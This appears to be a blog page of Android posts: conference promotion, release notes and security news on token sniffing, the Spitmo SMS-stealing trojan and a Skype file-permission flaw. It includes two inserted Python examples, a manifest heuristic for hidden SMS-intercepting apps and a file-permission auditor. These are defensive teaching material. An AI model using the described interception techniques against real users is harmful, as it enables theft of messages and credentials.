Showing posts sorted by relevance for query Android.

AnDevCon 2 (The Android Developer Conference)


The technical conference for software developers building or selling Android apps arrives after a smashing debut in March 2011 (nearly 1,000 attendees and 20 major sponsors).  It will offer one day of intensive workshops, followed by three days of technical classes.  More than 1,000 software developers, engineers and entrepreneurs from 35 nations are projected to attend Android DevCon and choose from 70 classes to bring Android open source development to a high level.
Android handsets are taking the world by storm.  And because it’s an open platform, Android is finding its way into tablets, set-top boxes and just about everything you can imagine.
You can receive a $100 discount off the Full Event Passport and/or gain free admission to the exhibits

According to The AnDevCon-2 Chairman:- 

"Android’s success is incredible. Driven by the energy of the open-source movement, backed by many of the biggest names in software, hardware and carrier services, Android is taking off like a rocket. Between handsets and the emerging world of Honeycomb-based tablets, there are superlatives everywhere. Astounding. Amazing. Astonishing. And that’s just the letter “A.”
Come to AnDevCon II: The Android Developer Conference to learn how to succeed with your mobile apps development, deployment and marketing.
AnDevCon is focused 100% on your need to thrive in the hot and exciting world of Android apps. Produced by BZ Media – publishers of SD Times, the newspaper for the software development industry – this is the most info-packed, most practical Android conference in the world. At AnDevCon, you'll be able to choose from dozens of workshops and technical classes at all levels, from overview to intermediate, from advanced to expert. Come and learn what fits your needs, as our sessions are organized into five subject areas suitable for you and everyone on your team:
Developer Essentials: These technical classes and workshops are for all Android developers and cover all programming topics.
Android Enterprise: These technical sessions cover topics specific to building and managing apps for employees, business customers and partners, such as back-end integration corporate data center communications, ERP or CRM systems.
Android Business: These classes and workshops are for entrepreneurial developers who want to learn the most effective ways of distributing and selling Android apps, including how to maximize profit through the Android Market.
Android Tablets: These classes and workshops are specific to Android Honeycomb and the world of Android tablets.
Embedded Android: These classes and workshops are for developers working close to the hardware, such as on custom devices, or diving deep into the internals of this flavor of embedded Linux.
But wait – there’s more, lots more. In the AnDevCon exhibit hall, you'll learn about the best tools, services and resources for Android developers and marketers. Mingle and network during breaks and at our big evening reception. There's more, much more… this is the conference you won't want to miss.
Join us for three days and learn from the brightest minds in the Android universe."

For registration and more information visit 




Android 4.4 'KitKat' -The More Compatible, Intelligent and Simple Android Ever

Android 4.4 'KitKat' All You Need to Know-The More Compatible, Intelligent and Simple Android Ever 

We have discussed Android several times before: it is one of the world's most popular and widely used operating systems, based on the Linux kernel and mainly designed for smartphones and tablet computers. Over the last four years we have seen various flavors of Android, among which 2.2 (Froyo), 2.3.3–2.3.7 (Gingerbread), 3.2 (Honeycomb), 4.0.3–4.0.4 (Ice Cream Sandwich) and 4.1.x–4.3.x (Jelly Bean) successfully drew public attention and gained popularity. After the success of Jelly Bean, Google has now introduced Android 4.4, nicknamed 'KitKat'. The official Android website explains the name: 'as everyone finds chocolate so tempting, we decided to name the next version of Android after one of our favorite chocolate treats, the KitKat®!' Android 4.4 has been in vogue since its release because Google improved performance and memory usage in this version, making it more compatible than ever; you can easily try KitKat on your older smartphones. Now let's look at Android 4.4 briefly.

Introduction:-
Readers, I will introduce in a simple way the new features of this version of Android. KitKat comes with a smarter and simpler search for Android, says the official Google blog, and, more importantly, should be compatible with older devices. This means more people can have access to the innovations than with other Android updates.

Performance and improved use of memory:-
Many of the major changes in KitKat are under the hood. The overall performance should improve, especially in relation to RAM. The Android developers site says "KitKat streamlines all the key components to reduce memory consumption", so even older smartphones running Android 4.4 will be faster and more responsive, even with 512MB of RAM. Multitasking should work better, and you can switch applications without your smartphone locking up.

Simpler and more powerful: (Google Now)
Google Now gains much more prominence in KitKat, with faster access, more cards, and more hands-free features. You can wake up your smartphone to start a search or take a picture just by saying "OK Google Now". It's like Google Glass, but on your smartphone.
Google Now will also gain space on your homescreen, if you want (you can slide left to right to find it), and Google will add more cards to make your smartphone smarter, automatically suggesting things based on your interests, location, and more.

Support SMS, location sharing, and animated GIFs in Hangouts:-
Google announced this week that Hangouts will become the main messaging app for text messages, video calls and instant messages. If you hate having your conversations scattered across several different apps, with KitKat you need only Hangouts, which replaces the old Mail app.
Location sharing can be very convenient when you're meeting a friend and want to tell them exactly where you are.
Finally, if you like to put emojis in messages, many are present in the new Google keyboard.

Improvements in NFC, Cloud Printing and File Management:-
KitKat also includes improvements that developers can now use to improve their apps. With NFC, it may automatically take you to the right app when you touch your device to a payment terminal. Printer manufacturers can develop services to send print files from Android to your printer. And the new framework for access to storage provides a consistent way to access files stored in other locations in other apps (e.g., open or save files in Dropbox or Box when you're in the browser).
In short, I wholeheartedly agree with Google in saying that KitKat 4.4 is "Smart, simple, and truly yours". To know more about Android 4.4 'KitKat' click here

While concluding this article, I on behalf of Team VOGH, want to thank our new guest editor Mr. Rafael Souza, for sharing his view and extensive thought on android 4.4. Rafael we love you. 




Google Deodorizes Sniffable Android Security Flaw



A new round of patching has begun for Android phones, the vast majority of which were found to be vulnerable to hackers if the owner was using it on an open WiFi network. The flaw affected 99.7 percent of all Android smartphones running Android 2.3.3 and earlier versions because they don't use a secure HTTPS connection, according to researchers.

Google (Nasdaq: GOOG) has begun rolling out a patch to fix a security flaw in versions 2.3.3 and earlier of its Android mobile operating system.
That flaw affects all Google services using the ClientLogin authentication protocol.
It lets hackers access any personal data available through Android's application programming interfaces (APIs).
"The flaw is now fixed for all versions of Android worldwide," Google spokesperson Randall Sarafa told LinuxInsider.
The patch is being rolled out in stages over several days, Sarafa said.

The Hole in Android
The flaw gained media attention after it was publicized by the University of Ulm.
Here's how it works: When an application wants to get access to Android's APIs, it requests an authentication token through ClientLogin by providing an account name and password.
The system then returns an authorization token, which is good for up to two weeks.
If the token is used in requests sent over unencrypted networks, such as WiFi networks, hackers can steal it. They can then use the token to access any personal data made available through the service API.
The hackers will gain full access to the victim's calendar, contacts information, or private Web-based photo albums. They'll be able to view, delete, or modify any calendar events, contacts, or private pictures, the Ulm University researchers said.
The flaw affected 99.7 percent of all Android smartphones running Android 2.3.3 and earlier versions because they don't use a secure HTTPS connection, the researchers said.
Google's patch forces an HTTPS connection for calendar and contacts sync on Android, Sarafa said.

More on the Flaw

Authentication tokens are widely used for online services such as eBay (Nasdaq: EBAY). They are also used by software and application vendors such as Microsoft (Nasdaq: MSFT) and Splunk, and in Apple's (Nasdaq: AAPL) iOS mobile operating system.
There was a problem with the authentication token on Android because Google's implementation was faulty, Paul Laudanski, director of ESET's cyber threat analysis center, told LinuxInsider.
"The entry point is having an unpatched or vulnerable Android system connecting to Google services using ClientAuth over an unencrypted public WiFi network," Laudanski explained. "The correct implementation is to transmit the authorization token in a secured manner."
Google services transmit the authorization token as an open text message, which can be easily stolen.
If the technology is implemented correctly and the authorization tokens are sent securely, then even if an unencrypted WiFi network is used, the user information would appear as garbage to snoopers, Laudanski pointed out.
Google's implementation of the technology may not have been faulty in and of itself, argues Mike Paquette, chief strategy officer at Top Layer Security.
"The problem appears to be the use of the ClientLogin protocol, allowing these sniffable authentication protocols, combined with a long expiry time," Paquette told LinuxInsider. "This makes exploits practical and even likely," he added.
Android smartphone owners should stay away from heavily used public WiFi hotspots, Paquette warned. "It's likely that attackers would target areas with large numbers of users of public WiFi in order to have the greatest return," he explained.

Old Problems Refreshed

The security flaw in Android was apparently first discovered by Dan Wallach of Princeton University, who blogged about it in February.
In an experiment during his undergraduate security class, he set up a sniffer with fellow students to listen in on his Android smartphone. They used Wireshark and Mallory.
Wireshark is a network protocol analyzer for Unix and Windows. Mallory is a transparent TCP and UDP proxy. It can be used to access network streams and assess mobile Web applications, among other things.
UDP, the User Datagram Protocol, is one of the core members of the Internet Protocol (IP) Suite. It lets applications directly send messages, or datagrams, to other hosts on an IP network.
The team found that Google doesn't encrypt traffic to Google Calendar, although it properly encrypts traffic to Gmail and Google Voice. Eavesdroppers could see victims' calendar transactions and likely impersonate them on Google Calendar, Wallach found.
The University of Ulm researchers built on Wallach's research.
Android smartphone users should apply the same security precautions to their devices as they would do with their laptops, Torsten George, vice president of marketing at Agiliance, told LinuxInsider.
"Smartphones are essentially taking on the role of a regular computer," George pointed out. "Thus, they are just as vulnerable to attack by cybercriminals as regular laptop or desktop computers."
Because they lack built-in security, smartphones "open up a bigger attack surface than traditional computer devices," George added.


"Python for Android" Has Been Launched


A new project named "Python For Android" has been launched. The goal of this project is to package your Python application into an APK. The project is under the umbrella of the Kivy organization but is not designed to be limited to Kivy only; it's an open-source project. To that end, the packaged applications currently only have one "bootstrap", which decompresses the files, creates an OpenGL ES 2.0 surface for drawing and sets up to handle audio and touch events. Although built for the Kivy project, the developers welcome anyone prepared to create a new lighter bootstrap mechanism. Python has been executable on Android through the Android Scripting project, but that doesn't create simple-to-install, self-contained binary files.

Overview:- 

  1. Download Android NDK, SDK
  2. Launch "android", and download latest Android platform
  3. Export some environment variables:
    export ANDROIDSDK="/path/to/android/android-sdk-linux_86"
    export ANDROIDNDK="/path/to/android/android-ndk-r7"
    export ANDROIDNDKVER=r7
    export ANDROIDAPI=14
    
  4. Clone python-for-android:
    git clone git://github.com/kivy/python-for-android
    
  5. Build a distribution with OpenSSL module, PIL and Kivy:
    cd python-for-android
    ./distribute.sh -m "openssl pil kivy"
    
  6. Go to your fresh distribution, build the APK of your application:
    cd dist/default
    ./build.py --package org.test.touchtracer --name touchtracer \
    --version 1.0 --dir ~/code/kivy/examples/demo/touchtracer debug
    
  7. Install the debug apk to your device:
    adb install bin/touchtracer-1.0-debug.apk
    
  8. Enjoy.


    To Know More About The Python For Android Project Click Here




Zeus Strategy Followed By SpyEye & Here The Victim is Android Users



In the world of Windows malware, SpyEye is a widespread malicious toolkit for creating and managing botnets. It is designed primarily for stealing banking credentials and other confidential information from infected systems. SpyEye is a major competitor of the infamous Zeus toolkit.
Zeus (also known as ZBot) generated a lot of interest in the mobile security community a couple of months ago when an Android version was discovered. Of course, we did not have to wait long before a version of SpyEye targeting Android was also developed, and sure enough a malicious SpyEye Android app was discovered a few days ago.
The functionality of Zeus and SpyEye on Windows is quite similar, so I was curious as to how similar their respective Android versions would be.
Zeus for Android purports to be a version of Trusteer Rapport security software. This social engineering trick is used in an attempt to convince the user that the application they are installing is legitimate.
SpyEye for Android, now detected by Sophos products as Andr/Spitmo-A, uses a slightly different but similar social engineering technique. When the user of a PC infected by the Windows version of SpyEye visits a targeted banking website, and when the site is using mobile transaction authorization numbers, the SpyEye Trojan may inject HTML content which will instruct the user to download and install the Android program to be used for transaction authorisation.


The SpyEye application package does not show up as an icon in the "All apps" menu, so the user will only be able to find the package when the "Manage Applications" is launched from the mobile device's settings.
The application uses the display name "System" so that it seems like a standard Android system application.
When installed, Zeus for Android displayed a fake activation screen, and Spitmo is again very similar. However, Spitmo uses different tactics to convince the user that it is a legitimate application.
It applies for the following Android permissions:-
  • android.provider.Telephony.SMS_RECEIVED
  • android.intent.action.NEW_OUTGOING_CALL

This allows the malware to intercept outgoing phone calls. When a number is dialed, the call is intercepted before the connection is made and the dialed phone number is matched to a special number specified by the attacker in the alleged helper application installation instructions. If the number matches, Spitmo displays a fake activation number, which is always 251340.
Once installed, the functionality of Zeus and SpyEye is pretty much the same. A broadcast receiver intercepts all received SMS text messages and sends them to a command and control server using an HTTP POST request. The submitted information includes the sender's number and the full content of the message.
So far, it does not seem that this attack is widespread, but it shows that the developers of major malicious toolkits are closely watching their competition and matching the latest features. It also seems that support for Android is increasingly becoming an important part of their product strategy.

-News Source (N.Security)
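
For defenders reviewing an installed package, the traits described above (no launcher icon, the display name "System", receivers for the two listed broadcast actions, plus network access for the HTTP POST) can be checked against a decoded manifest. This is an added example, not code from the article or from Sophos; the heuristic, the package names and both sample manifests are constructed assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # namespace of android: attributes
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"
NEW_OUTGOING_CALL = "android.intent.action.NEW_OUTGOING_CALL"
SYSTEM_LIKE_LABELS = {"system"}  # the article reports the display name "System"

# Constructed sample: shows every trait the article lists (hypothetical package name).
CONSTRUCTED_SUSPECT = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.helper">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="System">
    <receiver android:name=".SmsRx">
      <intent-filter android:priority="1000">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".CallRx">
      <intent-filter>
        <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed sample: an ordinary SMS app with a visible launcher entry.
CONSTRUCTED_BENIGN = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.messages">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Messages">
    <activity android:name=".Main">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".SmsRx">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _filter_names(component, tag):
    """android:name values of every <tag> inside the component's intent filters."""
    return {
        el.get(A + "name")
        for flt in component.findall("intent-filter")
        for el in flt.findall(tag)
    }


def triage_manifest(manifest_xml):
    """Report which of the article's traits a decoded (text) manifest shows.

    Labels given as resource references (@string/...) are not resolved here.
    Use a hardened XML parser if the text comes from an untrusted pipeline.
    """
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    components = list(app) if app is not None else []
    label = app.get(A + "label", "") if app is not None else ""
    permissions = {p.get(A + "name") for p in root.findall("uses-permission")}

    has_launcher = any(
        c.tag in ("activity", "activity-alias")
        and "android.intent.action.MAIN" in _filter_names(c, "action")
        and "android.intent.category.LAUNCHER" in _filter_names(c, "category")
        for c in components
    )
    receiver_actions = set()
    for c in components:
        if c.tag == "receiver":
            receiver_actions |= _filter_names(c, "action")

    traits = {
        "no_launcher_icon": not has_launcher,
        "system_like_label": label.strip().lower() in SYSTEM_LIKE_LABELS,
        "sms_receiver": SMS_RECEIVED in receiver_actions,
        "outgoing_call_receiver": NEW_OUTGOING_CALL in receiver_actions,
        "internet_permission": "android.permission.INTERNET" in permissions,
    }
    # Assumed rule: SMS interception plus network access only matters for review
    # when the app also hides itself or poses as a platform component.
    hidden_or_disguised = traits["no_launcher_icon"] or traits["system_like_label"]
    needs_review = (
        traits["sms_receiver"] and traits["internet_permission"] and hidden_or_disguised
    )
    return {"package": root.get("package"), "traits": traits, "needs_review": needs_review}


if __name__ == "__main__":
    for sample in (CONSTRUCTED_SUSPECT, CONSTRUCTED_BENIGN):
        print(triage_manifest(sample))
```
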



Ubuntu for Android - A Full Ubuntu Desktop, On Your Docked Android Phone

We have great news for both Ubuntu & Android lovers. Canonical has announced a new product called Ubuntu for Android that will bring the popular Linux distribution to high-end Android smartphones. The product consists of a complete Ubuntu desktop experience that is intended to be installed on the device alongside the standard Android environment. Users will be able to run Ubuntu from their phone when they plug the device into a dock that connects to a keyboard and monitor. The underlying concept is similar to that of the WebTop environment that Motorola ships on the Atrix handset and other devices.
The new Ubuntu variant runs on top of the Android kernel and is designed to work well on devices with dual-core ARM CPUs. Unlike Motorola's Ubuntu-based WebTop environment, Ubuntu for Android brings a much more complete desktop stack with a number of popular applications. It also provides more comprehensive integration with the Android environment on the user's phone. The default application stack includes the Chromium Web browser, the Thunderbird e-mail client, the Gwibber social networking program, the VLC video player, and a selection of other software. The environment includes a unified contact system that will make the user's Android address book fully accessible in the Ubuntu environment. It can also detect the social network accounts that the user has configured in Android and automatically enable them in Gwibber. Further details can be found Here


-Source (Ubuntu & Arstechnica)





Skype Fixes Android App Vulnerability

Skype has fixed the privacy vulnerability in its Android application that allowed malicious apps to harvest user data.
The vulnerability has been addressed in the latest Skype for Android, Version 1.0.0.983, and the user data has been properly secured on the mobile device, Adrian Asher, chief information security officer at Skype, wrote on the Skype blog on April 20. The problem did not exist for Verizon customers.

Skype for Android was storing names, dates of birth, location information, account balances, phone numbers, email addresses and other biographic details in a nonencrypted and easily accessible file on the mobile device, Justin Case, an amateur Android developer, wrote on the Android Police blog on April 15. Any rogue app could have harvested the personal data as well as old instant messages from insecure database files, according to Case.

Android by default sandboxes applications so that data from one app can’t be accessed by another. In this case, Skype overwrote the default by assigning incorrect file-level permissions, Case said. The data-collecting app Case developed to demonstrate the vulnerability did not require any unusual permissions and worked on non-jailbroken Android devices.

“We have had no reported examples of any third-party malicious application misusing information from the Skype directory on Android devices,” Asher said.

Case confirmed that the updated version closed the security hole and that his sample rogue app no longer can access the information stored in the database, David Ruddock posted on the Android Police blog. Skype changed the permissions of the databases where the data was stored so that only the Skype app can access the information, Ruddock said.

Case noted that the database files were unencrypted in his original analysis. Skype did not respond to eWEEK’s requests for whether the data is encrypted in the new version.
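
The permission problem described above can be checked on any app-private directory tree you have pulled for review. This is an added example, not Skype's or Case's code: it lists files that carry read or write bits for other users, notes whether the parent directories actually let another UID reach them (standard Unix semantics, assumed to apply to the app data directory), and shows the owner-only form the fix is reported to have restored. The directory layout and file names are constructed.

```python
import os
import stat
import tempfile

OTHER_RW = stat.S_IROTH | stat.S_IWOTH


def audit_private_dir(root):
    """List regular files under root that carry read or write bits for 'other'.

    'reachable' is True only when every directory from root down to the file
    also has the other-execute bit, so another UID can actually open the path.
    The directories above root are assumed to be traversable.
    """
    findings = []
    traversable = {root: bool(os.lstat(root).st_mode & stat.S_IXOTH)}
    for dirpath, dirnames, filenames in os.walk(root):
        parent_ok = traversable[dirpath]
        for name in dirnames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            traversable[path] = parent_ok and bool(mode & stat.S_IXOTH)
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode) or not mode & OTHER_RW:
                continue
            findings.append({
                "path": os.path.relpath(path, root),
                "mode": oct(stat.S_IMODE(mode)),
                "world_readable": bool(mode & stat.S_IROTH),
                "world_writable": bool(mode & stat.S_IWOTH),
                "reachable": parent_ok,
            })
    return sorted(findings, key=lambda f: f["path"])


def restrict_to_owner(root):
    """Drop every group and other permission bit below root (symlinks skipped)."""
    paths = [root]
    for dirpath, dirnames, filenames in os.walk(root):
        paths += [os.path.join(dirpath, n) for n in dirnames + filenames]
    for path in paths:
        mode = os.lstat(path).st_mode
        if not stat.S_ISLNK(mode):
            os.chmod(path, stat.S_IMODE(mode) & 0o700)


def build_constructed_tree(base):
    """Populate base with a small constructed app-data layout of mixed modes."""
    dir_modes = {"databases": 0o755, "files": 0o700}
    file_modes = {
        "databases/main.db": 0o666,  # world-readable and reachable
        "files/shared.xml": 0o644,   # world-readable, but parent blocks traversal
        "config.xml": 0o600,         # owner-only
    }
    for name in dir_modes:
        os.mkdir(os.path.join(base, name))
    for rel, mode in file_modes.items():
        path = os.path.join(base, rel)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    for name, mode in dir_modes.items():
        os.chmod(os.path.join(base, name), mode)
    os.chmod(base, 0o751)
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_constructed_tree(tmp)
        for finding in audit_private_dir(tmp):
            print(finding)
        restrict_to_owner(tmp)
        print("after restrict_to_owner:", audit_private_dir(tmp))
```
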

Case originally discovered the issue in the beta version of Skype Video that had been released last week. The fix will be addressed when Skype launches the official version.

In addition to the security fix, Skype added the ability to make VOIP (voice over IP) calls over 3G data connections to the app, even for calls in the United States. The 3G calling feature in the app will not be supported for Android phones over the Verizon Wireless network because Verizon already allows 3G Skype calls, thanks to an exclusive partner agreement signed in 2010.

The Android app previously allowed users to only send instant messages or place calls using the phone’s existing service or over WiFi. With this new version, users can call anyone without using up any minutes on their calling plan because the calls are carried over the mobile data plan. Bypassing the mobile carrier is not entirely free, as users are still subject to Skype fees.

Major carriers have opposed the practice in the past, and only Verizon customers had Skype’s VOIP capability up until now. Even if users aren’t interested in 3G calls, they should upgrade just for the security fix.

Asher reminded users to download the app only from Skype or the official Android Market links to avoid malicious apps.


National Security Agency (NSA) Released Security Enhanced (SE) Android


US National Security Agency (NSA) released the first public release of the Security Enhanced (SE) Android Project, a program designed to find and plug security holes and risks in the Android flavor of Linux. SE Android is based on the NSA’s SELinux, first released in 2000.
SEAndroid is the name of both a project to identify, and find solutions for, critical gaps in Android security and of a reference implementation of a security enhanced Android. The project is currently focusing its efforts on enabling SELinux functionality in the hope that it can limit the damage done by malicious apps, but hopes to widen its scope in the future.
SE Android was first publicly described at Linux Security Summit 2011. In essence, the NSA is attempting to bring the same access control and damage mitigation measures found in SELinux to the Android Open Source Project. In the Security Summit presentation, a number of known security vulnerabilities were demonstrated and tested against a version of Android running SE Android controls. All exploits failed unless specifically tailored to the particular system, and even in those cases the exploit’s effectiveness was much reduced.
SEAndroid is only available as source and is built by cloning the Android Open Source Project (AOSP) git repository, and then applying the SE Android modifications from the project’s git repository. Currently the project builds on Fedora 16, and has built on Fedora 14 and 15. Instructions on how to build for emulators and devices (specifically the Nexus S) and how to get started developing policies are available from the project’s wiki.





Microsoft Releases SkyDrive For Android Phones

A few weeks ago software giant Microsoft announced that it would release an official SkyDrive app for Android phones.  The application is now ready to download and use. This new app for Android is similar to other mobile apps for Windows Phone and iOS and is a key part of making sure your SkyDrive files are accessible and shareable from all your devices. The app was mainly designed to work best with Android 4.0 Ice Cream Sandwich, though it will work on Android 2.3 and above. "In building the new SkyDrive app for Android, we wanted to ensure we kept the same intuitive design of all SkyDrive experiences while also making use of Android design patterns and conventional interactions, so this feels natural for people with Android phones," Mike Torres, group program manager for SkyDrive Apps, wrote in a blog post Tuesday.



Brief Description:-
SkyDrive is the place to store your files so you can access them from virtually any device. With SkyDrive for Android, you can now easily access and share files on the go. You can also upload photos or videos from your phone to SkyDrive.

Features:-

  • Access all of your SkyDrive content including files shared with you.
  • View recently used documents.
  • Choose multiple photos or videos to upload from your phone.
  • Share your files and photos – send a link in email or in another app.
  • Open your SkyDrive files in other Android apps.
  • Manage your files – delete, or create new folders.
The official SkyDrive app is now available in the Google Play store. For more information and to download click here.







Android Vulnerability - Hacker Can Gain Complete Control of Your SmartPhone
 
Security experts have discovered a serious flaw in a component of the operating system of Google Inc’s widely used Android smartphone that they say hackers can exploit to gain control of the devices. Researchers at startup cyber security firm CrowdStrike said they have figured out how to use that bug to launch attacks and take control of some Android devices.
CrowdStrike, which will demonstrate its findings next week at a major computer security conference in San Francisco, said an attacker sends an email or text message that appears to be from a trusted source, like the user’s phone carrier. The message urges the recipient to click on a link, which if done infects the device. At that point, the hacker gains complete control of the phone, enabling him or her to eavesdrop on phone calls and monitor the location of the device, said Dmitri Alperovitch, chief technology officer and co-founder of CrowdStrike.
Google spokesman Jay Nancarrow declined comment on Crowdstrike’s claim. Alperovitch said the firm conducted the research to highlight how mobile devices are increasingly vulnerable to a type of attack widely carried out against PCs. In such instances, hackers find previously unknown vulnerabilities in software, then exploit those flaws with malicious software that is delivered via tainted links or attached documents. He said smartphone users need to prepare for this type of attack, which typically cannot be identified or thwarted by mobile device security software.
“With modifications and perhaps use of different exploits, this attack will work on every smartphone device and represents the biggest security threat on those devices,” said Alperovitch, who was vice president of threat research at McAfee Inc before he co-founded CrowdStrike.
Researchers at CrowdStrike were not the first to identify such a threat, though such warnings are less common than reports of malicious applications that make their way to online websites, such as Apple’s App Store or the Android Market.
In July 2009, researchers Charlie Miller and Collin Mulliner figured out a way to attack Apple’s iPhone by sending malicious code embedded in text messages that was invisible to the phone’s user. Apple repaired the bug in the software a few weeks after the pair warned it of the problem.
The method devised by CrowdStrike currently works on devices running Android 2.2, also known as Froyo. That version is installed on about 28 percent of all Android devices, according to a Google survey conducted over two weeks ending February 1. Alperovitch said he expects to have a second version of the software finished by next week that can attack phones running Android 2.3. That version, widely known as Gingerbread, is installed on another 59 percent of all Android devices, according to Google. CrowdStrike’s method of attack makes use of a previously unpublicized security flaw in a piece of software known as webkit, which is built into the Android operating system’s Web browser.


-Source (MyBroadband, Google, CrowdStrike)




Android becomes second most popular malware



The first quarter was the most active in malware history and mobile attacks are moving to the forefront, according to McAfee data. Android attacks are also picking up. McAfee’s first quarter threat report noted that attacks surged in the first quarter, but spam has fallen. In fact, there were 6 million unique malware samples in the first quarter, the highest ever for the first three months of the year. February had the most new malware samples—2.75 million. Fake anti-virus software—think Mac Defender—reached its highest levels in March with 350,000 unique samples. As for emerging threats, McAfee noted that Android devices are becoming malware havens. Android was the second most popular environment for mobile malware behind Symbian in the first quarter. Historically, Android remains No. 3.

McAfee Labs combats several developing families of malware that attack Android phones. One of the families, Android/DrdDream, comprises a variety of legitimate games and apps that have been injected with malicious code. These threats are unique and quite dangerous due to the use of two root exploits to gain greater control of those phones. The two exploits—Exploit/LVedu and Exploit/DiutesEx—were initially used by users trying to gain legitimate root access to their own devices, a process commonly referred to as rooting. In the PC world, malware often uses exploits to enable drive-by downloads that infect machines visiting specially designed or compromised websites. For mobile devices, much of the malware has required user interaction, but in the near future mobile exploits will certainly allow automatic malware installation. Like Android/DrdDream, the Android/Drad family is made up of maliciously modified applications.
This family sends device information to an attacker-controlled site. Just like in the PC malware world, Android/Drad listens for commands from the attacker. The malware can also download additional software, though it stops short of being a full-fledged mobile botnet. It appears that the malware uses blackhat search-engine optimization techniques, a process of manipulating search engine results to place dangerous sites higher than they should appear in lists of hits.


Android handsets 'leak' personal data


More than 99% of Android phones are potentially leaking data that, if stolen, could be used to get the information they store online.
The data being leaked is typically used to get at web-based services such as Google Calendar.
The discovery was made by German security researchers looking at how Android phones handle identification information.
Google has yet to comment on the loophole uncovered by the researchers.
ID attack

University of Ulm researchers Bastian Konings, Jens Nickels, and Florian Schaub made their discovery while watching how Android phones handle login credentials for web-based services.
Many applications installed on Android phones interact with Google services by asking for an authentication token - essentially a digital ID card for that app. Once issued the token removes the need to keep logging in to a service for a given length of time.
Sometimes, found the researchers, these tokens are sent in plain text over wireless networks. This makes the tokens easy to spot so criminals eavesdropping on the wi-fi traffic would be able to find and steal them, suggest the researchers.
Armed with the token, criminals would be able to pose as a particular user and get at their personal information.
Even worse, found the researchers, tokens are not bound to particular phones or time of use so they can be used to impersonate a handset almost anywhere.
"[T]he adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user," the researchers wrote in a blog post explaining their findings.
Abuse of the loophole might mean some people lose data but other changes may be harder to spot.
"...an adversary could change the stored e-mail address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business," the team speculated.
There is no suggestion that attackers are exploiting the Android loophole at the moment.
Almost all versions of the Android operating system were passing round unencrypted authentication tokens, found the researchers. It was fixed in version 2.3.4 but, suggest Google figures, only 0.3% of Android phones are running this software.
Some Google services, such as image sharing site Picasa, are still using unencrypted authentication tokens that can be stolen, found the team.
The researchers urged Android phone owners to update their device to avoid falling victim to attacks via the loophole. Google is also known to be working with operators and handset makers to get updates to people faster than at present.


Adobe Patches Multiple Security Holes in Adobe Flash Player & AIR (CVE-2012-5274 to 5280)

Critical Buffer Overflow, Memory Corruption & Security bypass Vulnerability in Adobe Flash Player & AIR Patched

Adobe, the American multinational computer software company, has released new versions of its Flash Player to eliminate a number of critical vulnerabilities in Flash Player that could lead to system crashes or remote attackers controlling computers running compromised software. All the flaws were discovered by members of the Google Security Team and are associated with several CVE numbers: CVE-2012-5274, CVE-2012-5275, CVE-2012-5276, CVE-2012-5277, CVE-2012-5280 are buffer overflows, CVE-2012-5279 is a memory corruption issue and CVE-2012-5278 is a security bypass; all of which are listed as potentially allowing an attacker to inject malicious code into the system. Google said it will update Flash Player installed with Google Chrome, and Microsoft will do the same with Internet Explorer 10. In the security bulletin Adobe said that it has released security updates for Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh, Adobe Flash Player 11.2.202.243 and earlier versions for Linux, Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x. These updates address vulnerabilities that could cause a crash and potentially allow an attacker to take control of the affected system.

Adobe recommends users update their product installations to the latest versions:-
  • Users of Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh should update to Adobe Flash Player 11.5.502.110.
  • Users of Adobe Flash Player 11.2.202.243 and earlier versions for Linux should update to Adobe Flash Player 11.2.202.251.
  • Flash Player installed with Google Chrome will automatically be updated to the latest Google Chrome version, which will include Adobe Flash Player 11.5.31.2 for Windows, Macintosh and Linux.
  • Flash Player installed with Internet Explorer 10 will automatically be updated to the latest Internet Explorer 10 version, which will include Adobe Flash Player 11.3.376.12 for Windows.
  • Users of Adobe Flash Player 11.1.115.20 and earlier versions on Android 4.x devices should update to Adobe Flash Player 11.1.115.27.
  • Users of Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and earlier versions should update to Flash Player 11.1.111.24.
  • Users of Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (including AIR for iOS) and Android should update to Adobe AIR 3.5.0.600.

AFFECTED SOFTWARE VERSIONS:- 
  • Adobe Flash Player 11.4.402.287 and earlier versions for Windows and Macintosh
  • Adobe Flash Player 11.2.202.243 and earlier versions for Linux
  • Adobe Flash Player 11.1.115.20 and earlier versions for Android 4.x
  • Adobe Flash Player 11.1.111.19 and earlier versions for Android 3.x and 2.x
  • Adobe AIR 3.4.0.2710 and earlier versions for Windows and Macintosh, SDK (includes AIR for iOS) and Android

